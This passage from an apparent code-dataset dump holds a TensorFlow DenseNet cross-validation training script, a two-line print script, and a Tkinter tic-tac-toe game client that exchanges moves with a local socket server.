"step-5": "def densenet(D,DT,F,model):\r\n import scipy.io as sio\r\n import time\r\n import os\r\n import math\r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n\r\n\r\n Dataset = D\r\n if DT == 'org':\r\n data_type = 'original'\r\n else:\r\n data_type = 'augmented'\r\n\r\n fs = model.fs\r\n fm1 = model.fm1\r\n batch_size = model.batch_size[0] \r\n learn_rate = model.learn_rate\r\n num_layers = model.num_layers\r\n k_fm = model.k_fm\r\n bottleneck = model.bottleneck\r\n dropout_prob = model.dropout_prob\r\n num_of_test = model.num_of_test\r\n\r\n ###############\r\n # load training / testing set from CrossVal folder,\r\n # names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'\r\n # name for testing set, 'D1_1st_fold_test.mat'\r\n ###############\r\n if F == 1:\r\n file_name = '1st_fold'\r\n elif F == 2:\r\n file_name = '2nd_fold'\r\n elif F == 3:\r\n file_name = '3rd_fold'\r\n elif F == 4:\r\n file_name = '4th_fold'\r\n elif F == 5:\r\n file_name = '5th_fold'\r\n path = os.path.join('CrossVal', 'D'+Dataset)\r\n print(\"path \" ,path)\r\n if data_type == 'original':\r\n Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))\r\n else:\r\n Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))\r\n Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))\r\n\r\n if Dataset == '1':\r\n number_of_classes = 24\r\n num_of_ep = 50\r\n num_of_test = 20\r\n if data_type == 'augmented':\r\n train_imgs = 526190\r\n else:\r\n train_imgs = 52619\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n elif Dataset == '2':\r\n number_of_classes = 36\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 20120\r\n else:\r\n train_imgs = 2012\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n else:\r\n number_of_classes = 10\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 16000\r\n else:\r\n train_imgs = 1600\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n\r\n iteration_to_display = int(iteration / num_of_test) \r\n list_to_display = []\r\n for i in range(num_of_test):\r\n if i !=num_of_test:\r\n list_to_display.append(int(iteration_to_display*(i+1)))\r\n del i\r\n\r\n\r\n total_fm_Block_1 = fm1+(num_layers*k_fm)\r\n total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)\r\n total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)\r\n fc_nodes = [total_fm_Block_3 ]\r\n\r\n\r\n Train_Images = Train['trainImages']\r\n Train_Labels = Train['trainLabels2']\r\n total_trainImages = len(Train_Images[0,2])\r\n print(total_trainImages)\r\n Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')\r\n Train_Labels = Train_Labels.transpose().astype('float64')\r\n\r\n\r\n Test_Images = Test['testImages']\r\n Test_Labels = Test['testLabels2']\r\n total_testImages = len(Test_Images[0,2])\r\n Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')\r\n Test_Labels = Test_Labels.transpose().astype('float64')\r\n Target_labels = np.argmax(Test_Labels,axis=1)\r\n\r\n del Test\r\n del Train\r\n\r\n import tensorflow as tf\r\n tf.reset_default_graph()\r\n g = tf.Graph()\r\n with g.as_default():\r\n tf.set_random_seed(1)\r\n\r\n def weight_variable(shape,n):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial,name=n)\r\n\r\n def bias_variable(shape,n):\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial,name=n)\r\n\r\n def avg_pool(input, s):\r\n return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def max_pool(input, s):\r\n return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def conv2d_1(input, in_features, out_features, kernel_size, name=\"W\", with_bias=False):\r\n W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)\r\n conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')\r\n if with_bias:\r\n return conv + bias_variable([ out_features ])\r\n return conv\r\n\r\n def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):\r\n with tf.variable_scope(scope):\r\n current = tf.layers.batch_normalization(current, scale=True, training=is_training)\r\n current = tf.nn.relu(current)\r\n current = conv2d_1(current, in_features, out_features, kernel_size, name=\"W\"+str(idx))\r\n current = tf.nn.dropout(current, keep_prob)\r\n return current\r\n\r\n def block(input, layers, in_features, growth, is_training, keep_prob, name=\"Block_\"):\r\n with tf.name_scope(name):\r\n with tf.variable_scope(name):\r\n current = input\r\n features = in_features\r\n for idx in range(layers):\r\n tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))\r\n current = tf.concat((current, tmp), axis=3)\r\n features += growth\r\n return current, features\r\n\r\n\r\n x = tf.placeholder(tf.float32, shape=[None, 784])\r\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\r\n x_image = tf.reshape(x, [-1, 28, 28, 1])\r\n keep_prob = tf.placeholder(tf.float32)\r\n training = tf.placeholder(tf.bool)\r\n\r\n\r\n current = conv2d_1(x_image, 1, fm1, fs, name=\"W1\", with_bias=False)\r\n\r\n current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name=\"Block_1\")\r\n b1_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n t1_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')\r\n t1_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_2\")\r\n b2_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_2\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n t2_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')\r\n t2_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_3\")\r\n b3_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_3\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_3')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')\r\n t3_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')\r\n t3_conv_printop = tf.Print(current, [current])\r\n current = avg_pool(current, 7)\r\n current = tf.reshape(current, [tf.shape(current)[0], -1])\r\n\r\n with tf.name_scope(\"Dense_Last_lyr\"):\r\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes],\"w_fc3\")\r\n b_fc3 = bias_variable([number_of_classes],\"b_fc3\")\r\n y_conv = tf.matmul(current, W_fc3) + b_fc3\r\n prediction_prob = tf.nn.softmax(y_conv)\r\n prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])\r\n\r\n with tf.name_scope(\"Xent\"):\r\n cross_entropy = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\r\n\r\n with tf.name_scope(\"train\"):\r\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(extra_update_ops):\r\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)\r\n\r\n with tf.name_scope(\"accuracy\"):\r\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])\r\n predicted_labels = tf.argmax(y_conv, 1)\r\n predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])\r\n\r\n index = 0\r\n index_end = index + batch_size\r\n remaining = 0\r\n start_time = time.time()\r\n costs = []\r\n accuracy_list = []\r\n list_of_predicted_list = []\r\n\r\n with tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer(),tf.set_random_seed(0))\r\n for i in range(iteration):\r\n if index_end > total_trainImages:\r\n remaining = total_trainImages - (index_end-batch_size) \r\n images = Train_Images[(index_end-batch_size):total_trainImages, :]\r\n labels = Train_Labels[(index_end-batch_size):total_trainImages, :]\r\n index = 0\r\n index_end = index + batch_size - remaining\r\n images = np.vstack((images, Train_Images[index:index_end, :]))\r\n labels = np.vstack((labels, Train_Labels[index:index_end, :]))\r\n batch = (images, labels)\r\n index = index_end\r\n index_end = index + batch_size\r\n else:\r\n batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])\r\n index = index + batch_size \r\n index_end = index_end + batch_size\r\n\r\n if i in list_to_display:\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time Before for loop: %f secs' % elapsed_time)\r\n Accuracy = 0\r\n itrt_index = i\r\n print('debug: %d & %d' % (iteration,i))\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop, \r\n predicted_labels_printop,prediction_prob_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list_1 = wrong\r\n predicted_list_1 = predicted\r\n prediction_prob_1 = prediction_prob\r\n else:\r\n wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)\r\n predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)\r\n prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list_1)\r\n print('Average test accuracy: %g' % Accuracy)\r\n epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels, \r\n 'prediction_prob':prediction_prob, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = (itrt_index * batch_size) / total_trainImages\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n if i % 100 == 0:\r\n train_accuracy = accuracy.eval(feed_dict={\r\n x: batch[0], y_: batch[1], \r\n keep_prob: 1.0, training:False})\r\n print('step %d, training accuracy %g' % (i, train_accuracy))\r\n _, loss = sess.run([train_step, cross_entropy], \r\n feed_dict={x: batch[0], y_: batch[1], \r\n keep_prob: dropout_prob, training:True})\r\n\r\n iteration_cost = 0 # Defines a cost related to an epoch\r\n num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size minibatch_size in the train set \r\n iteration_cost += loss / num_minibatches\r\n costs.append(iteration_cost)\r\n if i % 100 == 0:\r\n print ('Loss: ',loss)\r\n\r\n\r\n Accuracy = 0\r\n training_time = time.time() - start_time\r\n print('Training Time: %f secs' % training_time)\r\n\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list = wrong\r\n predicted_list = predicted\r\n else:\r\n wrong_list = np.append(wrong_list,wrong,axis=0)\r\n predicted_list = np.append(predicted_list,predicted,axis=0)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n print('Average test accuracy: %g' % Accuracy)\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list)\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = math.ceil((iteration * batch_size) / total_trainImages)\r\n if epoch_around == 51:\r\n epoch_around = 50\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n \r\n \r\nclass MyModel:\r\n num_layers = 4\r\n k_fm = 24\r\n fs = 3\r\n fm1 = 32\r\n bottleneck = 4\r\n dropout_prob = 0.8\r\n batch_size = [16]\r\n learn_rate = 0.001\r\n num_of_test = 40\r\n\r\nmodel = MyModel()\r\n \r\n\r\ndensenet('1','org',1,model)\r\ndensenet('1','org',2,model)\r\ndensenet('1','org',3,model)\r\ndensenet('1','org',4,model)\r\ndensenet('1','org',5,model)\r\n\r\ndensenet('1','aug',1,model)\r\ndensenet('1','aug',2,model)\r\ndensenet('1','aug',3,model)\r\ndensenet('1','aug',4,model)\r\ndensenet('1','aug',5,model)\r\n\r\ndensenet('2','org',1,model)\r\ndensenet('2','org',2,model)\r\ndensenet('2','org',3,model)\r\ndensenet('2','org',4,model)\r\ndensenet('2','org',5,model)\r\n \r\ndensenet('2','aug',1,model)\r\ndensenet('2','aug',2,model)\r\ndensenet('2','aug',3,model)\r\ndensenet('2','aug',4,model)\r\ndensenet('2','aug',5,model)\r\n\r\ndensenet('3','org',1,model)\r\ndensenet('3','org',2,model)\r\ndensenet('3','org',3,model)\r\ndensenet('3','org',4,model)\r\ndensenet('3','org',5,model)\r\n\r\ndensenet('3','aug',1,model)\r\ndensenet('3','aug',2,model)\r\ndensenet('3','aug',3,model)\r\ndensenet('3','aug',4,model)\r\ndensenet('3','aug',5,model)\r\n",
"step-ids": [
1,
2,
3,
5,
6
]
}
|
[
1,
2,
3,
5,
6
] |
# Author: Andreas Francois Vermeulen
print("CrawlerSlaveYoke")
print("CSY-000000023.py")
|
normal
|
{
"blob_id": "322795bce189428823c45a26477555052c7d5022",
"index": 8933,
"step-1": "<mask token>\n",
"step-2": "print('CrawlerSlaveYoke')\nprint('CSY-000000023.py')\n",
"step-3": "# Author: Andreas Francois Vermeulen\nprint(\"CrawlerSlaveYoke\")\nprint(\"CSY-000000023.py\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
from PIL import Image, ImageTk
import time
import socket
import threading
root = Tk()
root.title("Tic-Tac-Toe")
root.geometry('600x600')
winner = False
def start_thread(target):
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
HOST = '127.0.0.1'
PORT = 65432
global connection_established
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
connection_established = True
def receive_data():
while True:
data = sock.recv(1024).decode()
print('decoded is',data)
if data == 'button':
labels.config(text="My Turn or O's Turn")
b1.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b1.config(state="disabled")
elif data == 'button2' :
labels.config(text="My Turn or O's Turn")
b2.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b2.config(state="disabled")
elif data == 'button3' :
labels.config(text="My Turn or O's Turn")
b3.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b3.config(state="disabled")
elif data == 'button4' :
labels.config(text="My Turn or O's Turn")
b4.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b4.config(state="disabled")
elif data == 'button5' :
labels.config(text="My Turn or O's Turn")
b5.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b5.config(state="disabled")
elif data == 'button6' :
labels.config(text="My Turn or O's Turn")
b6.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b6.config(state="disabled")
elif data == 'button7' :
labels.config(text="My Turn or O's Turn")
b7.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b7.config(state="disabled")
elif data == 'button8' :
labels.config(text="My Turn or O's Turn")
b8.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b8.config(state="disabled")
elif data == 'button9' :
labels.config(text="My Turn or O's Turn")
b9.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b9.config(state="disabled")
start_thread(receive_data)
def resize_image(event):
new_width = event.width
new_height = event.height
image = copy_of_image.resize((new_width, new_height))
photo = ImageTk.PhotoImage(image)
label.config(image = photo)
label.image = photo #avoid garbage collection
image = Image.open('C:\\Users\\User\\Any_Path\\Tic-tac-toe1.png')
copy_of_image = image.copy()
photo = ImageTk.PhotoImage(image)
label = ttk.Label(root, image = photo)
label.bind('<Configure>', resize_image)
label.pack(fill=BOTH, expand = YES)
root.after(5000, lambda: root.destroy()) # Destroy the widget after 30 seconds
root.mainloop()
New = Tk()
New.title('Tic-Tac-Toe')
New.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')
clicked = 'Y'
def checkwin():
global winner
winner = False
if b1["text"] == "X" and b2["text"] == "X" and b3["text"] == "X":
b1.config(bg='green')
b2.config(bg='green')
b3.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b4["text"] == "X" and b5["text"] == "X" and b6["text"] == "X":
b4.config(bg='green')
b5.config(bg='green')
b6.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b7["text"] == "X" and b8["text"] == "X" and b9["text"] == "X":
b7.config(bg='green')
b8.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b1["text"] == "X" and b4["text"] == "X" and b7["text"] == "X":
b1.config(bg='green')
b4.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b2["text"] == "X" and b5["text"] == "X" and b8["text"] == "X":
b2.config(bg='green')
b5.config(bg='green')
b8.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b3["text"] == "X" and b6["text"] == "X" and b9["text"] == "X":
b3.config(bg='green')
b6.config(bg='green')
b9.config(bg='green')
winner = True
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b1["text"] == "X" and b5["text"] == "X" and b9["text"] == "X":
b1.config(bg='green')
b5.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b3["text"] == "X" and b5["text"] == "X" and b7["text"] == "X":
b3.config(bg='green')
b5.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
###################################
elif b1["text"] == "O" and b2["text"] == "O" and b3["text"] == "O":
b1.config(bg='green')
b2.config(bg='green')
b3.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b4["text"] == "O" and b5["text"] == "O" and b6["text"] == "O":
b4.config(bg='green')
b5.config(bg='green')
b6.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b7["text"] == "O" and b8["text"] == "O" and b9["text"] == "O":
b7.config(bg='green')
b8.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b1["text"] == "O" and b4["text"] == "O" and b7["text"] == "O":
b1.config(bg='green')
b4.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b2["text"] == "O" and b5["text"] == "O" and b8["text"] == "O":
b2.config(bg='green')
b5.config(bg='green')
b8.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b3["text"] == "O" and b6["text"] == "O" and b9["text"] == "O":
b3.config(bg='green')
b6.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b1["text"] == "O" and b5["text"] == "O" and b9["text"] == "O":
b1.config(bg='green')
b5.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo('Winner',"Congo!!!!!!!O Wins!!!!!!!!")
elif b3["text"] == "O" and b5["text"] == "O" and b7["text"] == "O":
b3.config(bg='green')
b5.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
def b_click(b):
to_send = str(b)
to_send = to_send.replace('.', '')
to_send = str(to_send.replace('!', ''))
print(to_send)
global clicked
if b["text"] == '' and b['state'] != 'disabled' :
labels.config(text="X's Turn")
b.configure(state=DISABLED)
b['text'] = 'O'
checkwin()
if connection_established == True:
sock.send(to_send.encode())
for w in New.winfo_children():
w.configure(state="disabled")
b1 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b1))
b1.grid(row=0,column=0)
b2 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b2))
b2.grid(row=0,column=1)
b3 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b3))
b3.grid(row=0,column=2)
b4 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b4))
b4.grid(row=1,column=0)
b5 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b5))
b5.grid(row=1,column=1)
b6 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b6))
b6.grid(row=1,column=2)
b7 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b7))
b7.grid(row=2,column=0)
b8 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b8))
b8.grid(row=2,column=1)
b9 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b9))
b9.grid(row=2,column=2)
labels = Label(New, fg="white",bg="black", pady=1,text="Opponent Turn ",height=2,justify="center")
labels.grid(row=3,column=0)
for w in New.winfo_children():
w.configure(state="disabled")
#menu = Menu(New)
#New.config(menu=menu)
#options = Menu(menu,tearoff=False)
New.mainloop()
|
normal
|
{
"blob_id": "cc924892afe179e55166ea9b237b2bfe8ea900df",
"index": 2120,
